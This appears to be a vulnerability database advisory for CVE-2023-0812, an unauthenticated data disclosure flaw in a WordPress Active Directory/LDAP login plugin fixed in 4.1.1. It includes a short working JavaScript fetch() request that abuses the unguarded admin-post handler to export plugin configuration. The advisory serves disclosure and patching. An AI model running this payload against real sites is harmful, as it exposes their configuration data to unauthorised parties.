Active Directory Integration / LDAP Integration < 4.1.1 – Unauthenticated Data Disclosure | CVE 2023-0812 | Plugin Vulnerabilities

Description

The plugin does not have proper authorization or nonce values for some POST requests, leading to unauthenticated data disclosure.

In version 4.1.0 a nonce check was added to the request, but it still lacked authorization.

Proof of Concept

The `admin_init` hook calls MoLdapLocalLogin class login_widget_save_options() method where there are some post request handlers without authorization.

Exploit:

fetch('/wp-admin/admin-post.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'option=mo_ldap_login_send_query&export_configuration_choice=yes&inner_form_email_id=admin@localhost.org&inner_form_query_id=test',
        redirect: 'follow'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

ldap-login-for-intranet-sites

Fixed in 4.1.1

References

CVE

Classification

Type

SENSITIVE DATA DISCLOSURE

OWASP top 10

A3: Sensitive Data Exposure

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

0ed5e1b3-f2a3-4eb1-b8ae-d3a62f600107

Timeline

Publicly Published

2023-04-19 (about 2 years ago)

Added

2023-04-19 (about 2 years ago)

Last Updated

2023-04-19 (about 2 years ago)

Other

Published

Title

Published

2025-12-15

Title

Fancy Product Designer | WooCommerce WordPress < 6.5.0 - Unauthenticated Information Disclosure via 'url' Parameter

Published

2024-02-02

Title

Post Thumbnail Editor <= 2.4.8 - Sensitive Information Exposure

Published

2025-06-04

Title

elfsight Contact Form widget <= 2.3.1 - Unauthenticated Information Exposure

Published

2025-11-04

Title

SUMO Affiliates Pro < 11.1.0 - Authenticated (Subscriber+) Information Exposure

Published

2024-04-22

Title

Post Grid, Form Maker, Popup Maker, WooCommerce Blocks, Post Blocks, Post Carousel – Combo Blocks < 2.2.79 - Unauthenticated Sensitive Information Exposure